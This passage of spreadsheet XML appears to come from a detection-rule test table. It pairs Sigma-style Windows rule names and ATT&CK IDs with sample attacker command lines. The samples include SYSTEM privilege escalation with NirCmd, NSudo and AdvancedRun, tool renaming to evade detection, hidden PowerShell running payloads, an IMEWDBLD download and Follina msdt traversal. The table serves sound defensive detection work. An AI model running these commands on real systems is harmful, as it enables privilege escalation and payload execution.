          <t>nircmd.exe runassystem cmd.exe /c echo test</t>
        </is>
      </c>
      <c r="F3950" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3950" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3950" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3950" s="43" t="n"/>
      <c r="J3950" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3950" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3951" ht="15.75" customHeight="1" s="42">
      <c r="A3951" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3951" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd_as_system</t>
        </is>
      </c>
      <c r="C3951" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution As LOCAL SYSTEM</t>
        </is>
      </c>
      <c r="D3951" s="43" t="inlineStr">
        <is>
          <t>d9047477-0359-48c9-b8c7-792cedcdc9c4</t>
        </is>
      </c>
      <c r="E3951" s="43" t="inlineStr">
        <is>
          <t>nircmd.exe runassystem "C:\Windows\System32\cmd.exe" /c echo test</t>
        </is>
      </c>
      <c r="F3951" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3951" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3951" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3951" s="43" t="n"/>
      <c r="J3951" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3951" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3952" ht="15.75" customHeight="1" s="42">
      <c r="A3952" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3952" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nsudo</t>
        </is>
      </c>
      <c r="C3952" s="43" t="inlineStr">
        <is>
          <t>PUA - NSudo Execution</t>
        </is>
      </c>
      <c r="D3952" s="43" t="inlineStr">
        <is>
          <t>771d1eb5-9587-4568-95fb-9ec44153a012</t>
        </is>
      </c>
      <c r="E3952" s="43" t="inlineStr">
        <is>
          <t>NSudo.exe -U:S -P:E whoami</t>
        </is>
      </c>
      <c r="F3952" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3952" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3952" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3952" s="43" t="n"/>
      <c r="J3952" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3952" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3953" ht="15.75" customHeight="1" s="42">
      <c r="A3953" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3953" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nsudo</t>
        </is>
      </c>
      <c r="C3953" s="43" t="inlineStr">
        <is>
          <t>PUA - NSudo Execution</t>
        </is>
      </c>
      <c r="D3953" s="43" t="inlineStr">
        <is>
          <t>771d1eb5-9587-4568-95fb-9ec44153a012</t>
        </is>
      </c>
      <c r="E3953" s="43" t="inlineStr">
        <is>
          <t>NSudo.exe -u:s -p:e whoami</t>
        </is>
      </c>
      <c r="F3953" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3953" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3953" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3953" s="43" t="n"/>
      <c r="J3953" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3953" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3954" ht="15.75" customHeight="1" s="42">
      <c r="A3954" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3954" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nsudo</t>
        </is>
      </c>
      <c r="C3954" s="43" t="inlineStr">
        <is>
          <t>PUA - NSudo Execution</t>
        </is>
      </c>
      <c r="D3954" s="43" t="inlineStr">
        <is>
          <t>771d1eb5-9587-4568-95fb-9ec44153a012</t>
        </is>
      </c>
      <c r="E3954" s="43" t="inlineStr">
        <is>
          <t>ren NSudo.exe not_suspicious.exe &amp;&amp; .\not_suspicious.exe -U:S -P:E whoami</t>
        </is>
      </c>
      <c r="F3954" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3954" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3954" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3954" s="43" t="n"/>
      <c r="J3954" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3954" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3955" ht="15.75" customHeight="1" s="42">
      <c r="A3955" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3955" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nsudo</t>
        </is>
      </c>
      <c r="C3955" s="43" t="inlineStr">
        <is>
          <t>PUA - NSudo Execution</t>
        </is>
      </c>
      <c r="D3955" s="43" t="inlineStr">
        <is>
          <t>771d1eb5-9587-4568-95fb-9ec44153a012</t>
        </is>
      </c>
      <c r="E3955" s="43" t="inlineStr">
        <is>
          <t>NSudo.exe -ShowWindowMode:Hide -U:S -P:E whoami</t>
        </is>
      </c>
      <c r="F3955" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3955" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3955" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3955" s="43" t="n"/>
      <c r="J3955" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3955" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3956" ht="15.75" customHeight="1" s="42">
      <c r="A3956" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3956" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nsudo</t>
        </is>
      </c>
      <c r="C3956" s="43" t="inlineStr">
        <is>
          <t>PUA - NSudo Execution</t>
        </is>
      </c>
      <c r="D3956" s="43" t="inlineStr">
        <is>
          <t>771d1eb5-9587-4568-95fb-9ec44153a012</t>
        </is>
      </c>
      <c r="E3956" s="43" t="inlineStr">
        <is>
          <t>NSudo.exe -M:H -U:E whoami</t>
        </is>
      </c>
      <c r="F3956" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3956" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3956" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3956" s="43" t="n"/>
      <c r="J3956" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3956" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3957" ht="15.75" customHeight="1" s="42">
      <c r="A3957" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3957" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_runxcmd</t>
        </is>
      </c>
      <c r="C3957" s="43" t="inlineStr">
        <is>
          <t>PUA - RunXCmd Execution</t>
        </is>
      </c>
      <c r="D3957" s="43" t="inlineStr">
        <is>
          <t>93199800-b52a-4dec-b762-75212c196542</t>
        </is>
      </c>
      <c r="E3957" s="43" t="inlineStr">
        <is>
          <t>RunXCmd.exe /account:system /exec:cmd.exe</t>
        </is>
      </c>
      <c r="F3957" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3957" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3957" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3957" s="43" t="n"/>
      <c r="J3957" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3957" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3958" ht="15.75" customHeight="1" s="42">
      <c r="A3958" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3958" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_runxcmd</t>
        </is>
      </c>
      <c r="C3958" s="43" t="inlineStr">
        <is>
          <t>PUA - RunXCmd Execution</t>
        </is>
      </c>
      <c r="D3958" s="43" t="inlineStr">
        <is>
          <t>93199800-b52a-4dec-b762-75212c196542</t>
        </is>
      </c>
      <c r="E3958" s="43" t="inlineStr">
        <is>
          <t>RunXCmd.exe /account=SYSTEM /exec=cmd.exe</t>
        </is>
      </c>
      <c r="F3958" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3958" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3958" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3958" s="43" t="n"/>
      <c r="J3958" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3958" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3959" ht="15.75" customHeight="1" s="42">
      <c r="A3959" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B3959" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_mshtml_runhtmlapplication</t>
        </is>
      </c>
      <c r="C3959" s="43" t="inlineStr">
        <is>
          <t>Mshtml.DLL RunHTMLApplication Suspicious Usage</t>
        </is>
      </c>
      <c r="D3959" s="43" t="inlineStr">
        <is>
          <t>4782eb5a-a513-4523-a0ac-f3082b26ac5c</t>
        </is>
      </c>
      <c r="E3959" s="43" t="inlineStr">
        <is>
          <t>rundll32 vbscript:"\..\mshtml,RunHTMLApplication" +String(CreateObject("WScript.Shell").Run("calc.exe"),0)</t>
        </is>
      </c>
      <c r="F3959" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3959" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3959" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3959" s="43" t="n"/>
      <c r="J3959" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3959" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3960" ht="15.75" customHeight="1" s="42">
      <c r="A3960" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3960" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C3960" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D3960" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E3960" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename cmd.exe /Run</t>
        </is>
      </c>
      <c r="F3960" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3960" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3960" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3960" s="43" t="n"/>
      <c r="J3960" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3960" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3961" ht="15.75" customHeight="1" s="42">
      <c r="A3961" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3961" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C3961" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D3961" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E3961" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename "cmd.exe" /RunAs 4 /WindowState 0 /Run</t>
        </is>
      </c>
      <c r="F3961" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3961" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3961" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3961" s="43" t="n"/>
      <c r="J3961" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3961" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3962" ht="15.75" customHeight="1" s="42">
      <c r="A3962" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3962" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C3962" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D3962" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E3962" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename "cmd.exe" /RunAs 4 /Run</t>
        </is>
      </c>
      <c r="F3962" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3962" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3962" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3962" s="43" t="n"/>
      <c r="J3962" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3962" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3963" ht="15.75" customHeight="1" s="42">
      <c r="A3963" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3963" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C3963" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D3963" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E3963" s="43" t="inlineStr">
        <is>
          <t>"C:\Users\SwachchhandaP\Downloads\advancedrun-x64\AdvancedRun.exe" /EXEFilename "cmd.exe" /Run</t>
        </is>
      </c>
      <c r="F3963" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3963" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3963" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3963" s="43" t="n"/>
      <c r="J3963" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3963" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3964" ht="15.75" customHeight="1" s="42">
      <c r="A3964" s="43" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B3964" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C3964" s="43" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D3964" s="43" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E3964" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set EXT=.SettingContent-ms &amp;&amp; copy mymalware%EXT% %TEMP%\temp.xml &amp;&amp; control.exe %TEMP%\temp.xml"</t>
        </is>
      </c>
      <c r="F3964" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3964" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3964" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3964" s="43" t="n"/>
      <c r="J3964" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3964" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3965" ht="15.75" customHeight="1" s="42">
      <c r="A3965" s="43" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B3965" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C3965" s="43" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D3965" s="43" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E3965" s="43" t="inlineStr">
        <is>
          <t>ren payload.txt payload.settingcontent-ms &amp;&amp; explorer.exe payload.settingcontent-ms</t>
        </is>
      </c>
      <c r="F3965" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3965" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3965" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3965" s="43" t="n"/>
      <c r="J3965" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3965" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3966" ht="15.75" customHeight="1" s="42">
      <c r="A3966" s="43" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B3966" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C3966" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D3966" s="43" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E3966" s="43" t="inlineStr">
        <is>
          <t>Parent.exe -run rundll32.exe some.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F3966" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3966" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3966" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3966" s="43" t="n"/>
      <c r="J3966" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3966" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3967" ht="15.75" customHeight="1" s="42">
      <c r="A3967" s="43" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B3967" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C3967" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D3967" s="43" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E3967" s="43" t="inlineStr">
        <is>
          <t>Parent.exe -start cscript.exe //B script.vbs</t>
        </is>
      </c>
      <c r="F3967" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3967" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3967" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3967" s="43" t="n"/>
      <c r="J3967" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3967" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3968" ht="15.75" customHeight="1" s="42">
      <c r="A3968" s="43" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B3968" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C3968" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D3968" s="43" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E3968" s="43" t="inlineStr">
        <is>
          <t>Parent.exe -launch regsvr32.exe /s some.dll</t>
        </is>
      </c>
      <c r="F3968" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3968" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3968" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3968" s="43" t="n"/>
      <c r="J3968" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3968" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3969" ht="15.75" customHeight="1" s="42">
      <c r="A3969" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B3969" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C3969" s="43" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D3969" s="43" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E3969" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\System32\\WScript.exe" "C:\\Users\\thaim\\AppData\\Local\\Temp\\T1036.007_masquerading.xls.vbs"</t>
        </is>
      </c>
      <c r="F3969" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3969" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3969" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3969" s="43" t="n"/>
      <c r="J3969" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3969" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3970" ht="15.75" customHeight="1" s="42">
      <c r="A3970" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B3970" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C3970" s="43" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D3970" s="43" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E3970" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\System32\\WScript.exe" "C:\\Users\\thaim\\AppData\\Local\\Temp\\AtomicTest.vbs"</t>
        </is>
      </c>
      <c r="F3970" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3970" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3970" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3970" s="43" t="n"/>
      <c r="J3970" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3970" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3971" ht="15.75" customHeight="1" s="42">
      <c r="A3971" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3971" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C3971" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D3971" s="43" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E3971" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Expand-Archive -Path 'C:\Temp\payload.zip' -DestinationPath 'C:\Temp\extracted' -Force; Start-Process 'binary.exe'"</t>
        </is>
      </c>
      <c r="F3971" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3971" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3971" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3971" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE (863218bd-c7d0-4c52-80cd-0a96c09f54af)</t>
        </is>
      </c>
      <c r="J3971" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3971" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3972" ht="15.75" customHeight="1" s="42">
      <c r="A3972" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3972" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C3972" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D3972" s="43" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E3972" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command Expand-Archive -Path 'C:\Temp\payload.zip' -DestinationPath 'C:\Temp\extracted' -Force; Start-Process 'binary.exe'</t>
        </is>
      </c>
      <c r="F3972" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3972" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3972" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3972" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J3972" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3972" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3973" ht="15.75" customHeight="1" s="42">
      <c r="A3973" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3973" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3973" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3973" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3973" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\System32\\IME\\SHARED\\IMEWDBLD.exe" https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml</t>
        </is>
      </c>
      <c r="F3973" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3973" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3973" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3973" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b); InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J3973" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3973" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3974" ht="15.75" customHeight="1" s="42">
      <c r="A3974" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3974" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C3974" s="43" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D3974" s="43" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E3974" s="43" t="inlineStr">
        <is>
          <t>mpiexec.exe /n 1 calc.exe</t>
        </is>
      </c>
      <c r="F3974" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3974" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3974" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3974" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary (cec8e918-30f7-4e2d-9bfa-a59cc97ae60f)</t>
        </is>
      </c>
      <c r="J3974" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3974" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3975" ht="15.75" customHeight="1" s="42">
      <c r="A3975" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3975" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C3975" s="43" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D3975" s="43" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E3975" s="43" t="inlineStr">
        <is>
          <t>pcwrun.exe msdt.exe /id PCWDiagnostic /skip true /param "IT_BrowseForFile=..\..\..\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F3975" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3975" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3975" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3975" s="43" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe (cd3d1298-eb3b-476c-ac67-12847de55813)</t>
        </is>
      </c>
      <c r="J3975" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3975" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3976" ht="15.75" customHeight="1" s="42">
      <c r="A3976" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3976" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C3976" s="43" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D3976" s="43" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E3976" s="43" t="inlineStr">
        <is>
          <t>pcwrun.exe msdt.exe /id PCWDiagnostic /skip true /param "IT_BrowseForFile=..%2F..%2F..%2FWINDOWS%2Fsystem32%2Fcalc.exe"</t>
        </is>
      </c>
      <c r="F3976" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3976" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3976" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3976" s="43" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe (cd3d1298-eb3b-476c-ac67-12847de55813); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3976" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3976" s="43" t="b">
